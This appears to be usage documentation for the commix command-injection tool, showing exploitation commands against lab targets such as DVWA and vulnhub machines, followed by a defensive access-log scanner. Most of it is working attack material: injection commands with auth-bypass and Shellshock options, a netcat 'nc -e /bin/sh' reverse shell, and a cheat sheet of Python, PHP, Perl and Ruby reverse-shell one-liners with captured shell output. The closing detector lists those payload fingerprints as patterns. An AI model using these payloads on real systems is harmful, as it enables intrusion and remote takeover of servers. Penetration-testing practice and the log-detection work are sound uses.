## Usage Examples
1. Exploiting [Damn Vulnerable Web App](http://www.dvwa.co.uk/):

   ```
   root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
   ```

2. Exploiting [php-Charts 1.0](http://www.exploit-db.com/exploits/25496/) using injection payload prefix and suffix strings:

   ```
   root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="'" --suffix="//"
   ```

3. Exploiting [OWASP Mutillidae](https://www.owasp.org/index.php/Category:OWASP_Mutillidae) using extra headers and an HTTP proxy:

   ```
   root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
   ```

4. Exploiting [Persistence](https://www.vulnhub.com/entry/persistence-1,103/) using the ICMP exfiltration technique:

   ```
   root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=INJECT_HERE" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
   ```

5. Exploiting [Persistence](https://www.vulnhub.com/entry/persistence-1,103/) using an alternative (Python) shell:

   ```
   root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=INJECT_HERE" --alter-shell="Python"
   ```

6. Exploiting [Kioptrix: Level 1.1 (#2)](http://www.kioptrix.com/dlvm/Kioptrix_Level_2.rar):

   ```
   root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=INJECT_HERE&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
   ```

7. Exploiting [Kioptrix: 2014 (#5)](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) using a custom user-agent and a specified injection technique:

   ```
   root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=INJECT_HERE&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="file-based" --root-dir="/"
   ```

8. Exploiting [CVE-2014-6271/Shellshock](https://pentesterlab.com/exercises/cve-2014-6271):

   ```
   root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
   ```

9. Exploiting [commix-testbed (cookie)](https://github.com/stasinopoulos/commix-testbed/tree/master/cookie) using cookie-based injection:

   ```
   root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=INJECT_HERE"
   ```

10. Exploiting [commix-testbed (user-agent)](https://github.com/stasinopoulos/commix-testbed/tree/master/user-agent) using user-agent-based injection:

    ```
    root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --user-agent="INJECT_HERE"
    ```

11. Exploiting [commix-testbed (referer)](https://github.com/stasinopoulos/commix-testbed/tree/master/referer) using referer-based injection:

    ```
    root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --referer="INJECT_HERE"
    ```

12. Exploiting [Flick 2](https://www.vulnhub.com/entry/flick-2,122/) using custom headers and the base64 encoding option:

    ```
    root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/INJECT_HERE" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
    ```

13. Exploiting [commix-testbed (JSON-based)](https://github.com/stasinopoulos/commix-testbed/tree/master/scenarios/regular/POST) using JSON POST data:

    ```
    root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data="{'addr':'INJECT_HERE','name':'admin'}"
    ```
### Step 1. Set up a netcat reverse shell listener.

In a shell on your machine, run `nc -lvp 1234` to begin listening for inbound connections on port 1234:

```
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
```

### Step 2. Execute netcat via commix.

In a separate shell, run:

```
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --os-cmd="nc -e /bin/sh 192.168.178.3 1234"
```

or

```
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --os-cmd="/bin/nc.traditional -e /bin/sh 192.168.178.3 1234"
```

### Step 3. Enjoy the netcat reverse shell.

```
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.178.3] from debian [192.168.178.4] 36746
whoami
www-data
```
In the following examples (which are inspired by Pentestmonkey's post "Reverse Shell Cheat Sheet") we're setting up reverse shells to netcat, without using netcat!! Feel free to add your suggestions!
### Step 1. Set up a netcat reverse shell listener.

In a shell on your machine, run `nc -lvp 1234` to begin listening for inbound connections on port 1234:

```
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
```
### Step 2. Choose one of the following netcat-without-netcat reverse shell payloads.

Execute one of the following netcat-without-netcat reverse shell payloads through commix as a command (i.e. via the `--os-cmd` option):

1. Python reverse shell:

   ```
   python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.178.3\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'
   ```

2. PHP reverse shell:

   ```
   php -r '\$sock=fsockopen(\"192.168.178.3\",1234);exec(\"/bin/sh -i <%263 >%263 2>%263\");'
   ```

3. Perl reverse shell:

   ```
   perl -e 'use Socket;\$i=\"192.168.178.3\";\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/bin/sh -i\");};'
   ```

4. Ruby reverse shell:

   ```
   ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"192.168.178.3\",1234);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'
   ```
Let's suppose that you want a reverse shell to IP "192.168.178.3" on port "1234" using the Python reverse shell. Just type the following command in a separate shell:

```
root@kali:~/Desktop/commix# python commix.py --url="http://192.168.178.4/commix-testbed/scenarios/regular/GET/classic.php?addr=INJECT_HERE" --os-cmd="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.178.3\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
```
### Step 3. Enjoy your netcat-without-netcat reverse shell.

```
root@kali:~# nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.178.3] from debian [192.168.178.4] 43712
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
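The injection points used throughout these examples (GET parameters, the User-Agent and Referer headers) and the `--os-cmd` payloads above all leave distinctive traces in the target's web server access log: a shell separator (`;`, `|`, `&`, `` ` ``, `$(`) glued onto an otherwise harmless parameter value, or one of the reverse-shell one-liners' fingerprints (`nc -e`, `socket.socket(`, `fsockopen(`, `sockaddr_in(`, `TCPSocket.new`). The script below is an added example for the defending side; it is not part of commix or of this wiki. It parses Apache combined-format log lines, URL-decodes each query parameter and the two headers, and flags values matching either pattern. The sample log lines, addresses and rule names are constructed for this demonstration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache "combined" log format, modelled on the
# request shapes in the examples above. Hosts, paths and timestamps are made up.
SAMPLE_LOG = """\
192.168.178.3 - - [10/Oct/2023:13:55:36 +0000] "GET /cmd/normal.php?addr=127.0.0.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.178.3 - - [10/Oct/2023:13:55:37 +0000] "GET /cmd/normal.php?addr=127.0.0.1%3Bnc+-e+%2Fbin%2Fsh+192.168.178.3+1234 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.178.3 - - [10/Oct/2023:13:55:38 +0000] "GET /cmd/normal.php?addr=127.0.0.1%26python+-c+%27s%3Dsocket.socket%28%29%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.178.3 - - [10/Oct/2023:13:55:39 +0000] "GET /dns-lookup.php?target_host=example.org HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.178.3 - - [10/Oct/2023:13:55:40 +0000] "GET /ping.php?ip=8.8.8.8 HTTP/1.1" 200 512 "-" "Mozilla/4.0|whoami"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rule A: a shell separator immediately followed by a command name that is
# common in injection payloads (the separators commix prepends to its commands).
CHAINED_CMD_RE = re.compile(
    r'(?:[;|&`]|\$\()\s*(?:nc|ncat|bash|sh|python|perl|php|ruby|id|whoami|cat|wget|curl)\b'
)

# Rule B: substrings characteristic of the reverse-shell one-liners listed above.
REVSHELL_MARKERS = (
    "nc -e", "nc.traditional -e", "/dev/tcp/", "socket.socket(",
    "fsockopen(", "sockaddr_in(", "TCPSocket.new",
)


def suspicious_fields(entry):
    """Yield (field_name, decoded_value) pairs worth inspecting in one log entry."""
    query = urlsplit(entry["target"]).query
    # parse_qsl percent-decodes values and turns '+' into spaces, so an
    # encoded separator such as %3B or %26 becomes visible as ';' or '&'.
    for name, value in parse_qsl(query, keep_blank_values=True):
        yield f"param:{name}", value
    yield "header:Referer", entry["referer"]
    yield "header:User-Agent", entry["ua"]


def classify(value):
    """Return the name of the first matching rule for a decoded value, or None."""
    lowered = value.lower()
    for marker in REVSHELL_MARKERS:
        if marker.lower() in lowered:
            return "reverse-shell-marker"
    if CHAINED_CMD_RE.search(value):
        return "chained-command"
    return None


def scan_log(text):
    """Return one finding dict per suspicious field across all parsable lines."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not combined format; skip rather than fail on odd lines
        entry = match.groupdict()
        for field, value in suspicious_fields(entry):
            rule = classify(value)
            if rule:
                findings.append({
                    "line": lineno, "src": entry["ip"], "field": field,
                    "rule": rule, "value": value,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['src']} {f['field']} [{f['rule']}] {f['value']!r}")
```

Run against the constructed sample, the script reports the `nc -e` and `socket.socket(` payloads in the `addr` parameter and the `|whoami` chained into the User-Agent, and stays silent on the two benign requests. The separator-plus-command rule will also fire on legitimate values that happen to contain `|id` or `;cat`, so treat it as a triage signal to be reviewed alongside the response size and status, while the reverse-shell marker rule is specific enough to alert on directly.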